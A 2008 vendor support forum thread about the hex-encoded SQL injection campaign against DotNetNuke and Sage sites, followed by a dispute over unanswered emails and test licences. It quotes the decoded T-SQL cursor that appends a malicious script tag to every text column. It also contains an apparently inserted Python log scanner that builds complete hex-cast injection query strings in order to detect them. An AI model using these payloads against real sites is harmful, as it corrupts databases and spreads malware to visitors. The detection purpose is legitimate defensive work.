10-05-2008 05:35 AM - last edited on 10-07-2008 06:59 AM by dlunceford
I've asked Sage Australia twice, but haven't had any reply so far
If you're not sure what I mean, see these:
http://ppshein.wordpress.com/tag/dos/ - this explains how it works
http://www.dotnetnuke.com:80/Community/Blogs/tabid/825/EntryID/1930/Default.aspx - This one is from the DNN Core team, basically ensuring that the framework is secure and telling you to check your legacy modules. It also provides tools to use to check for vulnerabilities and filters.
In short, it's something like this. They take a legit query string and add their code to it:
253D&tabid=66&mid=376;DECLARE @S CHAR(4000);SET @S=CAST
The hex code translates into this:
-- cursor over every char/text column of every user table
-- (xtype 99=ntext, 35=text, 231=nvarchar, 167=varchar)
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=
231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor
-- dynamic UPDATE appends the script tag to each column not already tagged
-- (the set assignment and the script URL were removed from the post)
INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
where '+@C+' not like ''%"></title><script
src="Removed link.!--''')FETCH NEXT
FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE
The JS scripts they reference in the src= lines are actually viruses. As I have some experience with viruses, I attempted to download the js file to look at it. The file never made it; my gateway antivirus flagged it and killed it each time. So I decided to leave well enough alone.
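A worked example of the check a practitioner would want after reading the post above: a small scanner that pulls the hex CAST(0x...) literal out of a request's query string, decodes it back to T-SQL and flags the cursor-over-sysobjects/syscolumns mass-UPDATE pattern. This is added example code, not code from the original post, from Sage, or from the DNN tools it links to. Everything in it is constructed: the log lines follow a simplified IIS W3C field layout (date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip), the script host is the unroutable example.invalid, and the decoded payload is my reconstruction of the shape shown in the post including the set/rtrim assignment the post has redacted. It goes slightly beyond the post by also handling NVARCHAR (UTF-16LE) payloads and double URL-encoded requests (the %253D style at the start of the quoted query string).

```python
import re
import urllib.parse

# --- Constructed sample data (not from the original post) ---------------------
# Defanged stand-in for the script tag appended to every text column.
INJECTED_TAG = '"></title><script src="http://example.invalid/x.js"></script><!--'

# Plain-text form of the hex-encoded cursor payload, reconstructed (assumption)
# in the shape the forum post shows; its set assignment was redacted there.
DECODED_PAYLOAD = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar,['+@C+']))+''" + INJECTED_TAG + "'' where '+@C+' "
    "not like ''%" + INJECTED_TAG + "''') FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

def mssql_hex(text, unicode_=False):
    """0x + hex bytes, as CHAR (one byte per char) or NCHAR (UTF-16LE) data."""
    raw = text.encode("utf-16-le") if unicode_ else text.encode("latin-1")
    return "0x" + raw.hex().upper()

# The attacker appends ";DECLARE ...;EXEC(@S);--" to a legitimate query string.
ATTACK_QUERY = urllib.parse.quote(
    "tabid=66&mid=376;DECLARE @S CHAR(4000);SET @S=CAST("
    + mssql_hex(DECODED_PAYLOAD) + " AS CHAR(4000));EXEC(@S);--", safe="=&;()@,-")
ATTACK_QUERY_N = urllib.parse.quote(
    "tabid=66&mid=376;DECLARE @S NVARCHAR(4000);SET @S=CAST("
    + mssql_hex(DECODED_PAYLOAD, unicode_=True) + " AS NVARCHAR(4000));EXEC(@S);--",
    safe="=&;()@,-")

# Constructed W3C-style log lines; the third request is URL-encoded twice.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip",
    "2008-10-05 05:35:12 10.0.0.5 GET /Default.aspx tabid=66&mid=376 80 - 198.51.100.7",
    "2008-10-05 05:35:40 10.0.0.5 GET /Default.aspx " + ATTACK_QUERY + " 80 - 203.0.113.9",
    "2008-10-05 05:36:02 10.0.0.5 GET /Default.aspx "
    + urllib.parse.quote(ATTACK_QUERY_N, safe="") + " 80 - 203.0.113.9",
]

# --- Detection ------------------------------------------------------------------
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\s*\d+\s*\)", re.I)
# A cursor over sysobjects/syscolumns feeding a dynamic UPDATE is the tell-tale
# of the mass-defacement payload, whatever host the script src points at.
MASS_UPDATE_RE = re.compile(r"sysobjects.+?syscolumns.+?exec\s*\(\s*'update", re.I | re.S)
# SQL Server system type ids (syscolumns.xtype) the payload filters on.
COLUMN_TYPES = {35: "text", 99: "ntext", 167: "varchar", 231: "nvarchar"}

def normalise(query, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded requests are seen."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(query)
        if decoded == query:
            break
        query = decoded
    return query

def decode_cast(hexdigits, typename):
    """Turn the 0x... literal back into text; N* types are UTF-16LE."""
    if len(hexdigits) % 2:          # odd length: not a valid byte string
        return None
    raw = bytes.fromhex(hexdigits)
    if typename.upper().startswith("N"):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def inspect_request(query):
    """Return one record per hex CAST literal found in the query string."""
    hits = []
    for m in CAST_RE.finditer(normalise(query)):
        payload = decode_cast(m.group(1), m.group(2))
        if payload is None:
            continue
        types = {int(t) for t in re.findall(r"xtype\s*=\s*(\d+)", payload)}
        hits.append({
            "decoded": payload,
            "mass_update": bool(MASS_UPDATE_RE.search(payload)),
            "script_src": sorted(set(re.findall(r'src="([^"]+)"', payload))),
            "targets": sorted(COLUMN_TYPES[t] for t in types if t in COLUMN_TYPES),
        })
    return hits

def scan_log(lines):
    """Run inspect_request over the cs-uri-query field of each log line."""
    findings = []
    for line in lines:
        if line.startswith("#"):
            continue
        f = line.split()
        if len(f) < 9:
            continue
        for hit in inspect_request(f[5]):
            findings.append({"when": f[0] + " " + f[1], "client": f[8], "hit": hit})
    return findings

if __name__ == "__main__":
    for e in scan_log(SAMPLE_LOG):
        print(e["when"], e["client"], "mass_update=%s" % e["hit"]["mass_update"],
              "targets=%s" % ",".join(e["hit"]["targets"]),
              "src=%s" % ",".join(e["hit"]["script_src"]))
```

Point it at real IIS logs by feeding the file's lines to scan_log and adjusting the field indexes to the #Fields header your server actually writes; the decoded payload is what to grep your tables for, since the src host changed from campaign to campaign while the cursor/UPDATE skeleton did not.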
10-07-2008 09:46 AM
Unfortunately, while there are actual tests you can do (has Sage actually tested them?), doing this testing is a bit difficult for me ... I only have one APFW license and I can't justify paying for more to install on a test server.
I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails.
10-08-2008 06:40 PM
Who exactly at Sage Australia did you ask these questions?
I sent email to Kurt and Ken, twice
10-08-2008 06:40 PM
I had a product specialist look into the issue. He tested with what was available to him with the links you posted along with additional research.
10-08-2008 07:23 PM
I have checked with Ken; neither one of us received an email regarding this issue from you.
Can you tell me when you sent it? Or can you resend it to me?
As far as licenses go for testing, you would need to buy them or become an ACC, which would give you 5 licenses for testing purposes.
10-08-2008 08:13 PM
I sent the email 10:53 on the 25th of Sept and again at 14:05 on the 30th.
I assume you're Kurt? You didn't say in your sig and you aren't using a Sage icon as other Sage staff do.
As to buying licenses to do testing, if Sage want me to do unpaid testing, they would at least supply the licenses. As it stands, I'll let Sage staff do the testing.
10-08-2008 09:46 PM
Yes, it's Kurt.
I keep every email that I receive from you, and I don't have either one from the dates you mentioned. I also checked Ken's email and they're not in his inbox either.
Mike, you make a very strong accusation in your earlier post that we don't respond to your emails.
"I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails"
Mike, this is a problem for me, as I make sure all of your emails get answered.
Please forward these emails to me so I can make sure the problem gets rectified.